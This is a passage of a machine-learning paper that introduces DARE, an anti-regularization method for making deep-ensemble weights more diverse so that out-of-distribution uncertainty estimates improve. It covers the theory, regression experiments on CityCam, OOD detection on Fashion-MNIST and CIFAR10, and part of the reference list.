We consider the supervised learning scenario where \( \mathcal{X} \) and \( \mathcal{Y} \) are respectively the input and output space. The learner has access to a training sample, \( S = \{(x_1, y_1), \ldots, (x_n, y_n)\} \in \mathcal{X} \times \mathcal{Y} \), of size \( n \in \mathbb{N} \). We consider a set \( \mathcal{H} \) of neural networks \( h_\theta \in \mathcal{H} \), where \( \theta \in \mathbb{R}^d \) refers to the network weights. We consider a loss function $\ell : \mathcal{Y} \times \mathcal{Y} \to \mathbb{R}_+$ and define the average error of any $h_\theta \in \mathcal{H}$ on $\mathcal{S}$,

$$L_S(h_\theta) = \frac{1}{n} \sum_{(x_i, y_i) \in S} \ell(h_\theta(x_i), y_i).$$

Traditional deep learning training generally involves the use of weight regularization to avoid overfitting. A penalization term $R(\theta)$ is added to the average error to form the objective function $L_S(h_\theta) + R(\theta)$, with $R(\theta)$ increasing with $\theta$ (e.g., $\ell_2$ and $\ell_1$ regularization). However, when used for deep ensembles, such regularization fosters the production of neural networks with small weights, which are then "close" to each other in the weight space and thus lack diversity. The same effect is also induced by the implicit regularization of the gradient descent algorithm (Smith et al., 2020). Based on these considerations, we propose the complete opposite approach, which consists in "anti-regularizing" the networks' weights as follows:

$$\min_\theta L_S(h_\theta) - \lambda R(\theta)$$ (1)

with $R : \mathbb{R}^d \to \mathbb{R}_+$ a monotone function growing with $\theta$ and $\lambda$ a trade-off parameter. The first term of the optimization objective in Eq. (1), $L_S(h_\theta)$, is the loss in-distribution. This term conditions the network to fit the training data, which implies smaller in-distribution prediction variances. The second term $-\lambda R(\theta)$ acts as an "anti-regularization" term which induces an increase of the network weights. This implies a larger variance of the ensemble weights, and therefore a larger prediction variance, especially for data "far" from the training distribution, on which the network's predictions are not conditioned. The parameter $\lambda \in \{0, 1\}$ is a binary variable which controls the trade-off between the in-distribution loss and the anti-regularization term. At each batch computation, $\lambda$ is updated as follows:

$$\lambda = \begin{cases} 1 & \text{if } L_S(h_\theta) \leq \tau \\ 0 & \text{if } L_S(h_\theta) > \tau, \end{cases}$$ (2)

with $\tau \in \mathbb{R}$ a predefined threshold. The underlying idea of the proposed optimization is that, to fulfill both objectives (reducing the loss in-distribution and increasing the weights), large weights will more likely appear in front of neurons which are never or only weakly activated by the training data. Therefore, if an out-of-distribution data point activates one of these neurons, large values are propagated through the network, which induces larger prediction variances. We show, in Sections 2.3 and 4.1, that this claim is supported by theoretical analysis and empirical observations.
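To make the procedure concrete, a minimal per-batch sketch of this optimization in PyTorch could look as follows; the log-form regularizer anticipates the choice made in Section 2.2, and the function and variable names (`anti_regularization`, `dare_batch_update`, `tau`) are ours, not taken from the released code:

```python
import torch

def anti_regularization(model):
    # R(theta) = (1/d) * sum_k log(theta_k^2): rewards large weights.
    # The small epsilon guards against log(0) for exactly-zero weights.
    d = sum(p.numel() for p in model.parameters())
    return sum((p ** 2 + 1e-12).log().sum() for p in model.parameters()) / d

def dare_batch_update(model, optimizer, x, y, loss_fn, tau):
    """One DARE update: minimize L_S(h) - lambda * R(theta), Eq. (1)."""
    loss = loss_fn(model(x), y)
    # Control process of Eq. (2): the anti-regularization is active
    # only while the in-distribution loss stays under the threshold tau.
    lam = 1.0 if loss.item() <= tau else 0.0
    objective = loss - lam * anti_regularization(model)
    optimizer.zero_grad()
    objective.backward()
    optimizer.step()
    return loss.item()
```

Each ensemble member would run this update independently on its own batches, which preserves the parallel training property discussed below.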
The control process is necessary to temper the weight increase, because a large increase of the weights induces an unstable network with reduced accuracy on the training data. To make sure a performance threshold $\tau$ is fulfilled, the weight increase is stopped ($\lambda = 0$) until the loss in-distribution comes back under the threshold. Therefore, the resulting ensemble is composed of networks fitting the training data with weights as large as possible.

### 2.2 IMPLEMENTATION

**Parallel optimization.** Each network of the ensemble is trained with batch gradient descent, independently of the others, with the objective of Eq. (1). This approach allows for parallel training of the ensemble. It is theoretically possible that each network ends up reaching the same optimum, resulting in no ensemble diversity. However, we empirically observe that this degenerate case never occurs, due to the randomness of the optimization process and the random initialization of the weights.

**Regularization function.** We propose the following choice of regularization function:

$$R(\theta) = \frac{1}{d} \sum_{k=1}^{d} \log(\theta_k^2)$$

with $\theta = (\theta_1, \ldots, \theta_d)$ the network weights. The use of the logarithmic function is motivated by the "water-filling" interpretation of DARE (cf. Section 2.3).

**Control threshold and model saving.** The control threshold $\tau$ should be chosen by the learner based on the targeted error level in-distribution. A smaller $\tau$ leads to a smaller increase of the weights. For $\tau = -\infty$, DARE is equivalent to a vanilla deep ensemble. An intuitive value of $\tau$ is close to the validation loss of a vanilla network. We propose, in this work, to set $\tau = L_{\text{val}}(h)(1 + \delta)$ with $\delta > 0$ and $h$ a vanilla network from a deep ensemble. Regarding the model saving across epochs, we propose to save the model when the validation loss is below $\tau$. Indeed, a small penalization of the validation loss should be accepted to enable the weight increase.

### 2.3 Theoretical Analysis for Linear Regression

The purpose of this theoretical analysis is to provide an understanding of the underlying dynamic of DARE. We focus our analysis on the linear regression case. This setting offers valuable insights on what happens between two layers of a fully-connected neural network. We consider the regression problem where $X \in \mathbb{R}^{n \times p}$ and $y \in \mathbb{R}^{n \times 1}$ are respectively the input and output data which compose the training set $S$. We consider the ensemble of linear hypotheses $\mathcal{H} = \{x \rightarrow x^T \theta;\ \theta \in \mathbb{R}^p\}$. To simplify the calculation without loss of generality, we assume that there exists $\theta^* \in \mathbb{R}^p$ such that $\mathcal{L}_S(h_{\theta^*}) = 0$. The loss function is the mean squared error, such that for any $h_\theta \in \mathcal{H}$ we have $n\mathcal{L}_S(h_\theta) = \|X\theta - y\|_2^2$. We denote $s^2 = (s_1^2, \ldots, s_p^2) \in \mathbb{R}_+^p$ the diagonal of the matrix $\frac{1}{n}X^TX$. We now consider an anti-regularized ensemble $\mathcal{H}_\tau$.
To characterize this ensemble, we make the following assumptions for any $h_\theta \in \mathcal{H}_\tau$:

$$\theta \sim \Theta_{\sigma^2}; \quad \mathbb{E}[\theta] = \theta^*, \quad \text{Cov}(\theta) = \text{diag}(\sigma^2)$$ (4)

$$\mathbb{E}[\mathcal{L}_S(h_\theta)] \leq \delta \tau$$ (5)

where $\delta > 0$ and $\text{diag}(\sigma^2)$ is the diagonal matrix of values $\sigma^2 \in \mathbb{R}_+^p$ verifying:

$$\sigma^2 = \arg\max_{\sigma^2=(\sigma_1^2,\ldots,\sigma_p^2)} \sum_{k=1}^p \log \left( \theta_k^{*2} + \sigma_k^2 \right)$$ (6)

As presented in Assumption 4, the large-weight ensemble distribution is described by the random variable $\theta$, centered at $\theta^*$ with variance $\sigma^2$. Assumption 5 implies that $P(\mathcal{L}_S(h_\theta) \geq \tau) \leq \delta$ by the Markov inequality, which models the fact that the loss of each member of DARE is maintained below a threshold $\tau$ thanks to the control process on $\lambda$ (cf. Section 2.1). Definition 6 approximates the impact of the anti-regularization term $-\mathcal{R}(\theta)$ in the DARE optimization formulation with an upper bound of $\max_\sigma \mathbb{E}[\mathcal{R}(\theta)]$. The weights are increased as much as possible while the loss stays under the threshold.

Our first theoretical result shows that the weight variance of the anti-regularized ensemble is the solution of a "water-filling" optimization problem (Boyd et al., 2006), and is proportional to $1/s^2$, i.e. the inverse of the input feature variances.

**Theorem 1.** There exists a constant $C > 0$ such that for any $k \in [1, p]$, the variance of the $k$-th weight component is expressed as follows:

$$\sigma_k^2 = \max \left[ \frac{C \delta \tau}{s_k^2} - \theta_k^{*2},\ 0 \right]$$ (7)

**Sketch of Proof.** A detailed proof is reported in the Appendix. The proof consists in first noticing that $\mathbb{E}[\mathcal{L}_S(h_\theta)] = \sum_{k=1}^p s_k^2 \sigma_k^2$. By combining this result with Assumptions 5 and 6, we show that $\sigma^2$ is the solution of the following water-filling problem:

$$\max_{\sigma^2 \in \mathbb{R}_+^p} \sum_{k=1}^p \log(\sigma_k^2 + \theta_k^{*2}) \quad \text{subject to} \quad \sum_{k=1}^p s_k^2 \sigma_k^2 \leq \delta \tau$$ (8)

As log is strictly concave and the constraints form a compact set on $\mathbb{R}^p$, problem (8) has a unique solution, which is given by (7).

The "water-filling" interpretation of the DARE optimization (8) is very insightful: $\delta \tau$ is the "global variance capacity" that can be dispatched to the network weights. As it grows as a function of $\tau$, the more the learner accepts a large error in-distribution, the more the global variance capacity increases. We see that each weight component has a different "variance cost" equal to $s_k^2$: for a high feature variance $s_k^2$, the increase of the corresponding weight variance $\sigma_k^2$ penalizes the training loss more. Thus, large weights appear more likely in front of low variance features. Notice also that, when $\theta_k^{*2}$ is high, $\frac{C \delta \tau}{s_k^2} - \theta_k^{*2}$ is more likely to be negative, leading to $\sigma_k = 0$ (cf. Eq. (7)). Besides, $\theta_k^*$ is generally higher for higher $s_k^2$, as it corresponds to a more informative feature, enhancing the effect $\sigma_k = 0$ for large $s_k^2$. We see the importance of choosing a strictly concave function like the logarithm (cf. Section 2.2): if, instead of log, we choose the identity function for instance, then the solution of (8) degenerates to $\sigma^2 = (0, \ldots, 0, \frac{\delta \tau}{s_p^2})$ with $s_p^2$ the lowest feature variance. In this case, all the weight variance is assigned to one component, which reduces the likelihood of detecting a deviation of a potential OOD input on another low variance feature.
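A small numerical sketch of the water-filling solution (7)-(8) follows; the bisection on the constant $C$ is our choice of solver, exploiting the fact that the budget constraint is monotone in $C$:

```python
import numpy as np

def dare_weight_variances(theta_star, s2, delta_tau, tol=1e-10):
    """Solve problem (8): sigma_k^2 = max(C*delta_tau/s_k^2 - theta_k*^2, 0),
    with C > 0 chosen so that sum_k s_k^2 * sigma_k^2 = delta_tau (Eq. (7))."""
    def sigma2(C):
        return np.maximum(C * delta_tau / s2 - theta_star ** 2, 0.0)

    lo, hi = 0.0, 1.0
    while np.sum(s2 * sigma2(hi)) < delta_tau:  # bracket the solution
        hi *= 2.0
    while hi - lo > tol:                        # bisection on the budget
        mid = 0.5 * (lo + hi)
        lo, hi = (mid, hi) if np.sum(s2 * sigma2(mid)) < delta_tau else (lo, mid)
    return sigma2(hi)
```

Running this on toy values reproduces the qualitative behavior discussed above: components with large feature variance $s_k^2$ or large $\theta_k^{*2}$ receive zero weight variance, while low-variance features absorb the budget.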
From Theorem 1, we now derive the expression of the DARE prediction variance for any data $x \in \mathbb{R}^p$:

**Corollary 1.1.** Let $\mathcal{H}_\tau$ be the large-weight ensemble defined by Assumptions 4, 5, 6 and $x \in \mathbb{R}^p$ an input data point; the variance of prediction for $h_\theta \in \mathcal{H}_\tau$ is:

$$ \text{Var}_{\theta \sim \Theta_{\sigma^2}} [h_\theta(x)] = \sum_{k=1}^{p} x_k^2 \max \left[ \frac{C \delta \tau}{s_k^2} - \theta_k^{*2},\ 0 \right] $$ (9)

We deduce from Corollary 1.1 that the prediction variance for $x$ is large when the components $x_k^2$ are large for features with low variance ($s_k^2 \ll 1$). Thus, the predicted uncertainty of DARE is correlated with deviations in directions in which the training input data has small variance. Applied to the hidden layers of deep fully-connected neural networks, Theorem 1 and Corollary 1.1 suggest that the weight variance is larger in front of neurons weakly activated by the training data. In this case, OOD data that activate such neurons propagate large values inside the network, resulting in a large output variance.

### 3 RELATED WORKS

Increasing ensemble diversity has been an enduring paradigm since the early days of ensemble learning research. At first, diversity was seen as a key feature for improving the generalization ability of ensembles (Brown et al., 2005; Kuncheva & Whitaker, 2003; Liu & Yao, 1999; Zhang et al., 2008). Then, with the growing interest in uncertainty quantification, the primary objective of ensemble diversity became to produce good uncertainty estimates.

In this perspective, a first category of methods proposes to increase diversity by using diverse architectures or training conditions among an ensemble of deep neural networks (Lakshminarayanan et al., 2017; Wen et al., 2020; Wenzel et al., 2020; Zaidi et al., 2021). The underlying idea is that the diversity of architectures or local minima reached by the different networks induces a diversity of predictions. Another category of methods proposes to explicitly impose a diversity constraint in the loss function of the networks. The loss function is then written $\mathcal{L} + \lambda \mathcal{P}$, where $\mathcal{L}$ is the loss for the task (e.g. mean squared error or negative log-likelihood (NLL)), $\mathcal{P}$ is a penalty term which decreases with the diversity of the ensemble, and $\lambda$ is the trade-off parameter between the two terms. Three kinds of penalization are distinguished in the literature. The first kind makes use of training data to compute the penalty term. It includes the Negative Correlation method (NegCorr) (Shui et al., 2018; Zhang et al., 2020), which applies the penalization from (Liu & Yao, 1999) to deep ensembles to enforce a negative correlation between the errors of the networks on the training set. Similarly, (Ross et al., 2020) imposes an orthogonality constraint between the gradients of the ensemble members on training data. Penalizing the similarity between hidden representations of the networks has also been proposed by (Ramé & Cord, 2021; Sinha et al., 2021) using adversarial training. The second kind of penalization refers to contrastive methods that enforce diversity on potential OOD instances rather than training data.
This avoids the issue of being over-conditioned by the training domain that can be encountered by the previous methods. In this category, several methods suppose that an unlabeled sample containing OOD data is available (Pagliardini et al., 2022; Tifrea et al., 2022). Others avoid this restrictive assumption and simulate potential OOD with random uniform data (Jain et al., 2020; Mehrtens et al., 2022) or instances localized around the training data (Segonne et al., 2022). In the last approach, considered by Anchored-Networks (AnchorNet) (Pearce et al., 2018) and Repulsive Deep Ensembles (RDE) (D'Angelo & Fortuin, 2021), the penalization $\mathcal{P}$ is a function of the network's parameters which forces the networks to reach local minima spaced from each other in parameter space. Our proposed DARE approach relates particularly to these two methods. Our assumption is that imposing weight diversity is more likely to produce global output diversity than imposing diversity on specific data regions, as done by the two previous kinds of penalization. Anchored-Networks appears to be an efficient tool, for instance, in the detection of corrupted data (Ulmer et al., 2020); however, it is very hard to set the right anchors and trade-off parameter (Scalia et al., 2020). A large initial variance can lead to a large weight variance but may not converge to an accurate model in-distribution. The DARE approach is more practical, as it starts to increase the weights only after reaching an acceptable loss threshold, which ensures that the training data are fitted.

4 EXPERIMENTS

The experiments are conducted on both regression and classification datasets. The source code of the experiments is available on GitHub (https://github.com/AnonymousAccount3/dare). We consider the following competitors: Deep-Ensemble (DE) (Lakshminarayanan et al., 2017), NegCorr (Shui et al., 2018), AnchorNet (Pearce et al., 2018), MOD (Jain et al., 2020) and RDE (D'Angelo & Fortuin, 2021). All are deep ensemble methods presented in Section 3. AnchorNet, NegCorr and MOD introduce a penalty term in the loss function multiplied by a trade-off parameter $\lambda$. The trade-off $\lambda$ and the anchor initialization parameter $\sigma$ for AnchorNet are selected through hold-out validation, as suggested in (Jain et al., 2020; Pearce et al., 2018). The kernel bandwidth for RDE is adaptive and chosen with the median heuristic, as suggested in the corresponding work (D'Angelo & Fortuin, 2021). The validation loss is monitored across epochs. At the end of training, we restore the weights corresponding to the epoch with the best validation loss. For DARE, the parameter $\delta$ is set to $1/4$ and the weight saving strategy follows the monitoring process described in Section 2.2. If nothing else is specified, the experiments are performed with ensembles of $M = 5$ fully-connected networks with 3 hidden layers of 100 neurons each and ReLU activations. The Adam optimization algorithm is used with learning rate 0.001 (Kingma & Ba, 2015). The batch size is set to 128. The experiments are repeated 5 times to compute standard deviations for the scores.

For the regression experiments, we use the Gaussian NLL defined in (Lakshminarayanan et al., 2017) as loss function. Each network in the ensemble returns the 2-dimensional output $h_\theta(x) = (\mu_\theta(x), \sigma_\theta(x))$, for any $x \in \mathcal{X}$. The mean prediction of the ensemble $(h_{\theta_1}, \ldots, h_{\theta_M})$ is then equal to $\bar{\mu}(x) = \frac{1}{M} \sum_{m=1}^{M} \mu_{\theta_m}(x)$ and the prediction variance is computed through $\bar{\sigma}^2(x) = \frac{1}{M} \sum_{m=1}^{M} \left(\sigma_{\theta_m}(x)^2 + \mu_{\theta_m}(x)^2\right) - \bar{\mu}(x)^2$.
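In code, this standard Gaussian-mixture aggregation (Lakshminarayanan et al., 2017) reads as follows; a minimal NumPy sketch with our own function name:

```python
import numpy as np

def ensemble_predict(mus, sigmas):
    """Aggregate M Gaussian heads (mu_m(x), sigma_m(x)) into the
    ensemble mean and variance of the resulting mixture.
    mus, sigmas: arrays of shape (M, n_points)."""
    mu_bar = mus.mean(axis=0)
    var_bar = (sigmas ** 2 + mus ** 2).mean(axis=0) - mu_bar ** 2
    return mu_bar, np.sqrt(var_bar)
```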
For the classification experiments, the loss function is the NLL and a softmax activation is added at the end-layer of the networks, following common practice in the classification setting. However, for DARE, we observe that the softmax activation cancels the effect of increasing the weights. Indeed, the softmax activation inverts the correlation between large outputs and high uncertainty, resulting in over-confidence for OOD data. To avoid this negative effect, the loss function is set to the mean squared error, scaled by the number of classes: $\ell(h_\theta(x), y) = \|h_\theta(x) - K y\|_2^2$, for any $(x, y) \in \mathcal{X} \times \mathcal{Y}$, with $y$ the one-hot encoded label, $h_\theta(x)$ the predicted logits and $K$ the number of classes. To provide uncertainty quantification, we define the following "ad-hoc" uncertainty score:

$$u(x) = \frac{1}{M} \sum_{m=1}^{M} \|h_{\theta_m}(x) - K \hat{y}_m\|_2^2 + \frac{1}{M} \sum_{m=1}^{M} \|h_{\theta_m}(x) - \bar{h}(x)\|_2^2$$ (10)

where $\hat{y}_m$ is the one-hot encoding of the estimated label $\arg\max_{k \in [1,K]} h_{\theta_m}(x)_k$ and $\bar{h}(x) = \frac{1}{M} \sum_{m=1}^{M} h_{\theta_m}(x)$. Equation (10) can be interpreted as the addition of the individual uncertainty estimation of each member to the ensemble prediction variance.

In the majority of previous works, OOD uncertainty quantification is studied from the perspective of OOD detection in the classification setting, where examples from other classes / datasets are considered as OOD (D'Angelo & Fortuin, 2021; Lakshminarayanan et al., 2017; Liu et al., 2022; Van Amersfoort et al., 2020). For regression, few attempts at uncertainty quantification on shifted datasets have been conducted: (Jain et al., 2020) separates male and female faces for an age prediction dataset, and (Jain et al., 2020; Foong et al., 2019; Segonne et al., 2022) propose OOD versions of several UCI regression datasets (Dua & Graff, 2017). In this work, we propose a novel regression setup for uncertainty estimation on shifted domains based on the CityCam dataset (Zhang et al., 2017), which has been used in several domain adaptation regression experiments (de Mathelin et al., 2020; Zhao et al., 2018). Our setup models real-life domain shift scenarios where uncertainty quantification is challenged and offers a clear visual understanding of the domain shifts (cf. Figure 3). For the classification experiments, we consider the OOD detection setup developed in (D'Angelo & Fortuin, 2021).

4.1 Synthetic experiments

We consider the "two-moons" binary classification dataset and the 1D regression experiment developed in (Jain et al., 2020). The visualization of the results is provided in Figure 1. The full description of the experiments is reported in the Appendix. We are interested in confirming the theoretical insights derived in Section 2.3, i.e. that the weight variance is inversely proportional to the training neuron activation variance and that OOD data activating neurons of small training activation variance propagate large values inside the network. Figure 2 presents the predicted uncertainty heat-map for one DARE network as well as the internal layer representations for the classification experiment.
We observe that the OOD neuron activations grow from one layer to the next. A correspondence between features with low variance for the training data and large weights can be clearly observed. In the last hidden layer (layer 3), the OOD components are large in directions of low training variance (components 80 to 100), to which correspond large weights. This observation explains the large uncertainty score for the OOD example.

Figure 2: Internal analysis of a DARE network. The uncertainty produced by one DARE member is presented on the left. On the right, the two figures on top present the expression of the training distribution in the three hidden layers (in blue) compared to the representation of one OOD example (in red). The components (neuron activations) are sorted in descending order of training variance. The two bottom figures present the average weight in front of each component, i.e. the mean weights that multiply the layer components to produce the next-layer representation.

4.2 Regression experiments on CityCam

We propose a novel regression setup for uncertainty estimation on shifted domains based on the CityCam dataset (Zhang et al., 2017), which has been used in several domain adaptation regression experiments (de Mathelin et al., 2020; Zhao et al., 2018). Our setup models real-life domain shift scenarios where uncertainty quantification is challenged and offers a clear visual understanding of the domain shifts (cf. Figure 3). The CityCam dataset is composed of images coming from different traffic cameras. The task consists in counting the number of vehicles present in the image, which is useful, for instance, to control the traffic in the city. To get relevant features for the task, we use the features of the last layer of a ResNet50 (He et al., 2016) pretrained on ImageNet (Deng et al., 2009). We propose three different kinds of domain shift (see the sketch after this list for the feature-extraction step):

Figure 3: **CityCam experimental setups.** The top blue images correspond to in-distribution examples and the bottom orange images to OOD examples.

1. **Camera-shift:** This experiment uses the images from 10 cameras in the CityCam dataset. For each round, 5 cameras are randomly selected as in-distribution while the 5 remaining cameras are considered out-of-distribution.
2. **Bigbus-shift:** Images marked as "big-bus", referring to the fact that a bus appears and masks a significant part of the image (Zhang et al., 2017), are used to create the OOD dataset.
3. **Weather-shift:** Blurry images caused by water drops landed on the camera are used as the OOD dataset.

These three experiments model real-life uncertainty quantification problems such as the generalization of uncertainty estimates to unseen domains (camera-shift), the robustness to changes in data acquisition (weather-shift) and the detection of rare abnormal events (bigbus-shift). Further details on these experimental setups are provided in the Appendix.
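As an illustration of the feature-extraction step described above, the following sketch uses torchvision; the exact preprocessing pipeline and weight version are our assumptions, since the paper does not specify them:

```python
import torch
from torchvision import models, transforms

# ImageNet-pretrained ResNet50 with the classification head removed,
# so the forward pass returns the 2048-dimensional last-layer features.
backbone = models.resnet50(weights=models.ResNet50_Weights.IMAGENET1K_V1)
backbone.fc = torch.nn.Identity()
backbone.eval()

preprocess = transforms.Compose([
    transforms.Resize(256),
    transforms.CenterCrop(224),
    transforms.ToTensor(),
    transforms.Normalize(mean=[0.485, 0.456, 0.406],
                         std=[0.229, 0.224, 0.225]),
])

@torch.no_grad()
def extract_features(pil_images):
    batch = torch.stack([preprocess(img) for img in pil_images])
    return backbone(batch)  # shape: (len(pil_images), 2048)
```

These fixed features then serve as inputs to the fully-connected ensembles evaluated below.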
| Methods | Camera (test) | Bigbus (test) | Weather (test) | Camera (OOD) | Bigbus (OOD) | Weather (OOD) |
|------------------|--------|--------|---------|--------|--------|---------|
| Deep Ensemble | 96.71 (0.54) | 97.60 (0.15) | 96.50 (0.15) | 63.0 (3.9) | 78.9 (0.9) | 88.8 (0.2) |
| Negative Correlation | 96.97 (1.34) | 97.68 (0.46) | 96.50 (1.37) | 63.8 (6.8) | 79.4 (2.9) | 89.0 (0.6) |
| MOD | 97.22 (1.05) | 97.82 (0.07) | 95.90 (0.15) | 65.6 (5.6) | 79.3 (0.0) | 88.8 (0.8) |
| Anchored Networks | 96.44 (0.32) | 96.72 (0.59) | 96.66 (0.30) | 64.1 (3.6) | 76.8 (2.2) | 89.8 (0.0) |
| RDE | 96.83 (0.13) | 97.19 (0.07) | 96.35 (0.61) | 64.0 (3.9) | 77.3 (0.4) | 89.2 (1.2) |
| DARE | 96.98 (0.16) | 96.55 (0.61) | 97.42 (0.15) | 70.9 (2.4) | 80.0 (0.7) | 93.7 (0.0) |

Table 1: **In-distribution and Out-of-distribution Coverage for CityCam.** The first three columns report the test (in-distribution) coverage and the last three the OOD coverage; scores are reported after using conformal prediction on the validation dataset.

The number of epochs is set to 100 for Camera-shift and Bigbus-shift, and 200 for Weather-shift, based on the number of instances in the datasets. We notice that all methods fully converge before reaching this limit of epochs. To assess the ensemble quality for the regression experiments, we consider the "conformalized out-of-distribution coverage". To compute this metric, the predicted standard deviations $\sigma(x)$ are used to produce confidence intervals of level $1 - \alpha$, such that:

$$C(x, \beta) = [\mu(x) + \Phi^{-1}(\alpha/2)\sigma(x) - \beta,\ \mu(x) + \Phi^{-1}(1 - \alpha/2)\sigma(x) + \beta],$$

with $\Phi^{-1}$ the quantile function of the standard normal distribution and $\beta \in \mathbb{R}$. The confidence intervals are then "conformalized" using conformal prediction (Romano et al., 2019): the parameter $\beta \in \mathbb{R}$ is defined such that a proportion $1 - \alpha$ of the validation data $(x, y)$ verify $y \in C(x, \beta)$. We consider a confidence level $1 - \alpha$ with $\alpha = 0.05$ and compute the coverage on the respective test and OOD datasets as follows:

$$\text{Cov}_{\text{test}} = \frac{1}{|\mathcal{S}_{\text{test}}|} \sum_{(x,y) \in \mathcal{S}_{\text{test}}} \mathbf{1}(y \in C(x, \beta))$$

$$\text{Cov}_{\text{ood}} = \frac{1}{|\mathcal{S}_{\text{ood}}|} \sum_{(x,y) \in \mathcal{S}_{\text{ood}}} \mathbf{1}(y \in C(x, \beta))$$

The results are reported in Table 1. We first observe that the test coverage for all methods is very similar, as a consequence of the "conformalization" on the validation dataset, which follows the same distribution as the test set. We observe, however, that DARE outperforms the other uncertainty quantification methods in terms of OOD coverage in the three experiments. In the camera-shift experiment, for instance, the out-of-distribution coverage for DARE is more than 5 points above the second-best method.
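A minimal sketch of this conformalization and coverage computation might be the following; the quantile-based choice of $\beta$ is a standard recipe and our assumption about the implementation details:

```python
import numpy as np
from scipy.stats import norm

def conformalize_beta(mu, sigma, y, alpha=0.05):
    """Smallest beta such that ~(1 - alpha) of validation targets satisfy
    y in C(x, beta) = [mu - z*sigma - beta, mu + z*sigma + beta]."""
    z = norm.ppf(1 - alpha / 2)
    # y is inside C(x, beta)  <=>  |y - mu| - z * sigma <= beta
    scores = np.abs(y - mu) - z * sigma
    return np.quantile(scores, 1 - alpha)

def coverage(mu, sigma, y, beta, alpha=0.05):
    z = norm.ppf(1 - alpha / 2)
    return np.mean(np.abs(y - mu) <= z * sigma + beta)

# beta is fitted on the validation split, then reused to compute
# Cov_test and Cov_ood on the test and OOD splits respectively.
```

Note that $\beta$ can be negative, shrinking intervals that are too wide on the validation set.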
### 4.3 Classification Experiments

| Methods | SVHN | CIFAR100 | Accuracy | CIFAR10 | MNIST | Accuracy |
|-------------|------|----------|----------|---------|-------|----------|
| DE (NLL) | 90.9 (0.4) | 86.4 (0.2) | **91.8 (0.1)** | 89.7 (0.9) | 62.7 (6.2) | **89.2 (0.2)** |
| AnchorNet | 91.0 (0.3) | **86.5 (0.2)** | **91.8 (0.0)** | 88.8 (1.1) | 68.7 (6.2) | 89.1 (0.2) |
| MOD | 91.3 (0.3) | 86.3 (0.3) | 91.7 (0.1) | 89.4 (1.7) | 60.8 (2.7) | 88.7 (0.4) |
| NegCorr | 91.3 (0.4) | 86.3 (0.4) | 91.7 (0.1) | 91.5 (0.8) | 68.9 (4.5) | 86.1 (0.6) |
| RDE | 91.2 (0.5) | 86.4 (0.3) | **91.8 (0.1)** | 90.1 (0.9) | 70.9 (5.8) | 89.1 (0.3) |
| DE (MSE) | 85.9 (1.2) | 77.7 (0.8) | 91.7 (0.1) | 96.5 (0.5) | 93.0 (5.3) | 88.6 (0.1) |
| DARE | **92.6 (0.7)** | 82.7 (0.5) | **91.8 (0.1)** | **97.7 (0.5)** | **97.4 (1.3)** | 87.2 (0.2) |

Table 2: OOD detection results. AUROC scores and ID accuracy are reported. The first three columns correspond to CIFAR10 as the in-distribution dataset (OOD: SVHN, CIFAR100) and the last three to Fashion-MNIST as the in-distribution dataset (OOD: CIFAR10, MNIST).

We consider the experimental setup defined in (D'Angelo & Fortuin, 2021) for OOD detection on Fashion-MNIST and CIFAR10. The MNIST dataset is used as the OOD dataset for Fashion-MNIST and the SVHN dataset for CIFAR10. We extend the experiments by adding CIFAR10 as OOD for Fashion-MNIST and CIFAR100 as OOD for CIFAR10. Thus, for both experiments, OOD detection is performed on both "near-OOD" and "far-OOD" datasets (Liu et al., 2022). To reduce the computational resources needed for CIFAR10, we consider the "multi-head" setting (Lee et al., 2015), where deep ensembles of fully-connected networks are trained over the penultimate layer of a pretrained ResNet32 (He et al., 2016). The obtained results are reported in Table 2 for DARE and the competitors. To fully evaluate the impact of the DARE optimization, we add the results obtained with a Deep Ensemble trained with the mean squared error (DE (MSE)), which is equivalent to DARE with $\lambda = 0$. We train 5 networks in each ensemble and repeat the experiments 5 times. The AUROC metric is used, computed with the uncertainty score defined in Equation (10) for DARE and DE (MSE) and with the entropy for the other methods.

We observe that DARE globally improves OOD detection. For instance, on Fashion-MNIST, we observe an improvement of 8 points on CIFAR10 and 34 points on MNIST compared to DE, with a loss of only 2 points of in-distribution accuracy. Mild results are obtained for CIFAR10: we observe an improvement for SVHN but not for CIFAR100. We argue that this is mainly due to the use of the mean squared error, which is not suited for this experiment, as indicated by the poor results of DE (MSE). Notice that for the Fashion-MNIST experiment the contrary is observed, as DE (MSE) provides a substantial improvement. We finally underline that DARE always performs better than its DE (MSE) counterpart.

## 5 Limitations and Perspectives

For now, the efficiency of DARE is limited to fully-connected neural networks with piece-wise linear activations and a linear end-activation. Moreover, the threshold setting is still based on a heuristic, which may be suboptimal. We have seen, however, that DARE can benefit a final fully-connected network head placed on top of deep features obtained with convolutions. Thanks to the practical aspect of DARE, the method can be combined with other deep ensemble or OOD detection methods. One can use a specific training process and then apply DARE afterward to increase diversity.
Future work will consider a "Bayesian" version of DARE by adding Gaussian noise with increasing variance to the weights of pretrained networks. ## References Moloud Abdar, Farhad Pourpanah, Sadiq Hussain, Dana Rezazadegan, Li Liu, Mohammad Ghavamzadeh, Paul Fieguth, Xiaochun Cao, Abbas Khosravi, U Rajendra Acharya, et al. A review of uncertainty quantification in deep learning: Techniques, applications and challenges. *Information Fusion*, 76:243–297, 2021. S Boyd, L Vandenberghe, and L Faybusovich. Convex optimization. *IEEE Transactions on Automatic Control*, 51(11):1859–1859, 2006. Gavin Brown, Jeremy L Wyatt, Peter Tino, and Yoshua Bengio. Managing diversity in regression ensembles. *Journal of machine learning research*, 6(9), 2005. Jiwoong Choi, Dayoung Chun, Hyun Kim, and Hyuk-Jae Lee. Gaussian yolov3: An accurate and fast object detector using localization uncertainty for autonomous driving. In *Proceedings of the IEEE/CVF International Conference on Computer Vision*, pp. 502–511, 2019. Francesco D’Angelo and Vincent Fortuin. Repulsive deep ensembles are bayesian. *Advances in Neural Information Processing Systems*, 34, 2021. Francesco D’Angelo and Christian Henning. Uncertainty-based out-of-distribution detection requires suitable function space priors. *arXiv preprint arXiv:2110.06020*, 2021. Antoine de Mathelin, Guillaume Richard, Francois Deheeger, Mathilde Moungeot, and Nicolas Vayatis. Adversarial weighting for domain adaptation in regression. *arXiv preprint arXiv:2006.08251*, 2020. Antoine de Mathelin, François Deheeger, Mathilde Moungeot, and Nicolas Vayatis. Handling distribution shift in tire design. In *NeurIPS 2021 Workshop on Distribution Shifts: Connecting Methods and Applications*, 2021. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In *2009 IEEE conference on computer vision and pattern recognition*, pp. 248–255. Ieee, 2009. Dheeru Dua and Casey Graff. UCI machine learning repository, 2017. URL http://archive.ics.uci.edu/ml Di Feng, Lars Rosenbaum, and Klaus Dietmayer. Towards safe 